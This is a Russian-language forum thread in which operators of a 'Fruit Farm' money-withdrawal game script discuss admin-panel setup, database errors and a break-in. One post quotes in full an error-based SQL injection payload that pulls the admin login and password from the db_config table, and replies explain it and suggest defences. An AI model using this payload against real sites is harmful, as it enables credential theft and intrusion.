Скрипт Фруктовая ферма с выводом денег.

  • Автор темы admin
  • Дата начала
Статус
В этой теме нельзя размещать новые ответы.
mobisaite
Участник
Сообщения
308
Реакции
63
  • #2.221
Kkeroll написал(а):
Ребята, помогите, пожалуйста! Как перенести админку? Чтобы не по адресу был: "домен сайта"/?menu=admin4ik
Заменить везде в файлах /?menu=admin4ik на свое
 
art199908
Участник
Сообщения
271
Реакции
36
  • #2.222
А что делать???
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #2.224
art199908 написал(а):
Если планируешь админить фруктовую ферму, то не думай, что все будет так легко. С чего-то надо будет начинать учиться, иначе вопросы будут, а ответов - нет. Поэтому и дыры учимся самостоятельно закрывать. Приобретать фф у пользователей, обещающих закрытые дыры - бесполезно. Продадут то, что есть в паблике и без изменений.
 
art199908
Участник
Сообщения
271
Реакции
36
  • #2.225
wh1skas написал(а):
Если планируешь админить фруктовую ферму, то не думай, что все будет так легко. С чего-то надо будет начинать учиться, иначе вопросы будут, а ответов - нет. Поэтому и дыры учимся самостоятельно закрывать. Приобретать фф у пользователей, обещающих закрытые дыры - бесполезно. Продадут то, что есть в паблике и без изменений.
да уж...безысходность какая то и бред, мне в голову не приходит вообще как можно взломать проект
 
art199908
Участник
Сообщения
271
Реакции
36
  • #2.226
я только что перешел на другой домен, и когда нажимаю вход, в самом верху пишет -

Код:
Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: Access denied for user 'root'@'localhost' (using password: NO) in /home/sqfcffjy/public_html/index.php on line 28

Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: A link to the server could not be established in /home/sqfcffjy/public_html/index.php on line 28

Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: Access denied for user 'root'@'localhost' (using password: NO) in /home/sqfcffjy/public_html/index.php on line 28

Warning: mysql_real_escape_string() [function.mysql-real-escape-string]: A link to the server could not be established in /home/sqfcffjy/public_html/index.php on line 28
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #2.227
art199908 написал(а):
да уж...безысходность какая то и бред, мне в голову не приходит вообще как можно взломать проект
Подмена запросов через input text, без htmlspecialchars будет беда в таких случаях.
 
art199908
Участник
Сообщения
271
Реакции
36
  • #2.228
wh1skas написал(а):
Подмена запросов через input text, без htmlspecialchars будет беда в таких случаях.
а подробнее можно пожалуйста? что делать в такой ситуации, когда нажимаешь войти в личный кабинет то пишет такую фигню, как это убрать и сделать нормально? Я кажется понял мне тут фильтрацию ставили и в личный кабинет на старом домене нельзя было зайти писало не верно, а когда нажимаешь регистрация а потом войти, то входит, какой файл отвечает за вход?
 
Kkeroll
Участник
Сообщения
22
Реакции
0
  • #2.229
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
  • #2.230
wh1skas вопрос возник,тяжело сделать еще 1 счет ?

не важно для каких целей
 
art199908
Участник
Сообщения
271
Реакции
36
  • #2.231
А все хорошо, когда мой сайт взломали мне написали в поддержку какие то коды, но это был явно не этот пользователь, с разных писал 1 человек я уверен, вот что писал(вам ничего это не говорит?) -
Код:
' and
(
    select 1
    from
    (
        select     count(*),
                concat
                (
                    (
                        select (select concat(admin,' ',pass) from db_config where id = 1)
                        from information_schema.tables
                        limit 0,1
                    ),
                    floor(rand(0)*2)
                ) x
        from information_schema.tables
        group by x) a
)
and '
 
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
  • #2.232
art199908 написал(а):
А все хорошо, когда мой сайт взломали мне написали в поддержку какие то коды, но это был явно не этот пользователь, с разных писал 1 человек я уверен, вот что писал(вам ничего это не говорит?) -
Код:
' and
(
    select 1
    from
    (
        select     count(*),
                concat
                (
                    (
                        select (select concat(admin,' ',pass) from db_config where id = 1)
                        from information_schema.tables
                        limit 0,1
                    ),
                    floor(rand(0)*2)
                ) x
        from information_schema.tables
        group by x) a
)
and '
говорит о том что хотят узнать лог и пас админки из таблицы конфиг
 
art199908
Участник
Сообщения
271
Реакции
36
  • #2.233
kvozimir написал(а):
говорит о том что хотят узнать лог и пас админки из таблицы конфиг
но ведь в итоге взломали, и я уверен всех так и взламывают, что делать в такой ситуации, как обезопасить сайт? Мне фильтрацию поставили от взлома sql инъекций, но мне кажется этого мало
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #2.234
Админку почистить от ненужного. Например пароли и логины пользователей убрать. История пополнений и выплат. Это первое, на что смотрят взломщики.
 
kvozimir
Участник
Сообщения
1.935
Реакции
409
ICQ
734713 734713
Skype
  • #2.235
art199908 написал(а):
но ведь в итоге взломали, и я уверен всех так и взламывают, что делать в такой ситуации, как обезопасить сайт? Мне фильтрацию поставили от взлома sql инъекций, но мне кажется этого мало
можно еще имя таблицы сменить
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #2.236
kvozimir написал(а):
можно еще имя таблицы сменить
Не поможет, потому что при попытке взлома, при помощи выгрузки БД по запросу UNION можно увидеть имена таблиц
 
art199908
Участник
Сообщения
271
Реакции
36
  • #2.238
wh1skas написал(а):
Админку почистить от ненужного. Например пароли и логины пользователей убрать. История пополнений и выплат. Это первое, на что смотрят взломщики.
Скажите пожалуйста конкретно что нужно сделать или делать вообще пожалуйста?
 
wh1skas
wildcake
Участник
Сообщения
1.017
Реакции
432
ICQ
564739604 564739604
  • #2.239
art199908 написал(а):
Скажите пожалуйста конкретно что нужно сделать или делать вообще пожалуйста?
Удали из админки файл, который отвечает за показ инфо о пользователях. Или в файле убери вывод этих данных.
kvozimir написал(а):
wh1skas вопрос возник,тяжело сделать еще 1 счет ?

не важно для каких целей
Можно сделать все, что душе угодно. Но я например еще не делал. Не подскажу с чего начать надо после создания второго кошелька.
 
art199908
Участник
Сообщения
271
Реакции
36
  • #2.240
wh1skas написал(а):
Удали из админки файл, который отвечает за показ инфо о пользователях. Или в файле убери вывод этих данных.
"Из админки" смысле из панели хостинга или где? как это вообще сделать, прости пожалуйста, я понимаю о чем ты, но не знаю где и что убрать
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху